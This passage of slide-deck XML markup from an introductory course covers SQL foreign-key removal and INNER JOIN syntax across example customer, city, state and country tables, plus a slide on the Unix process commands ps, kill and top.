            </a:r>
            <a:endParaRPr b="1" sz="2700">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2855" name="Google Shape;2855;p463"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="646075" y="1582175"/>
            <a:ext cx="7738800" cy="249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5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALTER TABLE your_table_name</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DROP FOREIGN KEY your_constraint_name;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ALTER TABLE inventory_history_tbl</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DROP FOREIGN KEY inventory_history_tbl_ibfk_1;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" sz="1800">
              <a:solidFill>
                <a:srgbClr val="6AA84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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="233150" y="268625"/>
            <a:ext cx="875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720">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Process Management</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3720">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="365" name="Google Shape;365;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771625" y="1161750"/>
            <a:ext cx="8170200" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B008B"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>ps - Display information about running  processes.</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B008B"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>kill - Terminate processes.</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-419100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="8B008B"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000">
                <a:solidFill>
                  <a:srgbClr val="8B008B"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>top - Display and update sorted information   about processes.</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="8B008B"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FFFFFF"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2860" name="Google Shape;2860;p464"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1952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chemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to join two tables?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2861" name="Google Shape;2861;p464"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="455950" y="1209025"/>
            <a:ext cx="8068200" cy="3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2750">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="275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2750">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table1</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="275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2750">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INNER</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2750">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JOIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table2</a:t>
            </a:r>
            <a:endParaRPr i="1" sz="2750">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2750">
                <a:solidFill>
                  <a:srgbClr val="0000CD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ON</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table1.column_name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> table2.column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2750">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>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465"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1952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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>How to join multiple tables?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2867" name="Google Shape;2867;p465"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1235850" y="2146725"/>
            <a:ext cx="6601200" cy="26646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Clr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Customer_tbl (</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table1 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>City_tbl </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table2 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>State_tbl </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table3 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-393700" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2600"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Country_tbl </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>table4 </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2868" name="Google Shape;2868;p465"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3393650" y="1236600"/>
            <a:ext cx="3180600" cy="26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accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>26oct2023_db</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>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sp>
        <p:nvSpPr>
          <p:cNvPr id="2873" name="Google Shape;2873;p466"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1952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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>How to join multiple tables?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2874" name="Google Shape;2874;p466"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="678775" y="1236600"/>
            <a:ext cx="8095800" cy="37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rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Poppins"/>
                <a:ea typeface="Poppins"/>
                <a:cs typeface="Poppins"/>
                <a:sym typeface="Poppins"/>
              </a:rPr>
              <a:t>select * from table1 </a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Poppins"/>
              <a:ea typeface="Poppins"/>
              <a:cs typeface="Poppins"/>
              <a:sym typeface="Poppins"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Poppins"/>
                <a:ea typeface="Poppins"/>
                <a:cs typeface="Poppins"/>
                <a:sym typeface="Poppins"/>
              </a:rPr>
              <a:t>inner join table2 </a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Poppins"/>
              <a:ea typeface="Poppins"/>
              <a:cs typeface="Poppins"/>
              <a:sym typeface="Poppins"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Poppins"/>
                <a:ea typeface="Poppins"/>
                <a:cs typeface="Poppins"/>
                <a:sym typeface="Poppins"/>
              </a:rPr>
              <a:t>inner join table3 </a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Poppins"/>
              <a:ea typeface="Poppins"/>
              <a:cs typeface="Poppins"/>
              <a:sym typeface="Poppins"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Poppins"/>
                <a:ea typeface="Poppins"/>
                <a:cs typeface="Poppins"/>
                <a:sym typeface="Poppins"/>
              </a:rPr>
              <a:t>inner join table4 </a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Poppins"/>
              <a:ea typeface="Poppins"/>
              <a:cs typeface="Poppins"/>
              <a:sym typeface="Poppins"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Poppins"/>
                <a:ea typeface="Poppins"/>
                <a:cs typeface="Poppins"/>
                <a:sym typeface="Poppins"/>
              </a:rPr>
              <a:t>ON </a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Poppins"/>
              <a:ea typeface="Poppins"/>
              <a:cs typeface="Poppins"/>
              <a:sym typeface="Poppins"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
                <a:latin typeface="Poppins"/>
                <a:ea typeface="Poppins"/>
                <a:cs typeface="Poppins"/>
                <a:sym typeface="Poppins"/>
              </a:rPr>
              <a:t>table1.colName=table2.colName AND table1.colName=table3.ColName AND table1.colName=table4.ColName;</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
              <a:latin typeface="Poppins"/>
              <a:ea typeface="Poppins"/>
              <a:cs typeface="Poppins"/>
              <a:sym typeface="Poppins"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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467"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1952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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>How to join multiple tables?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2900">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2880" name="Google Shape;2880;p467"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="85400" y="1438825"/>
          <a:ext cx="3000000" cy="3000000"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{5F29EBE2-DF6B-4956-BA54-5617D0952659}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="689850"/>
                <a:gridCol w="1372700"/>
                <a:gridCol w="950850"/>
                <a:gridCol w="760050"/>
                <a:gridCol w="1251825"/>
                <a:gridCol w="1497775"/>
                <a:gridCol w="2223825"/>
              </a:tblGrid>
              <a:tr h="748725">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="1500"/>
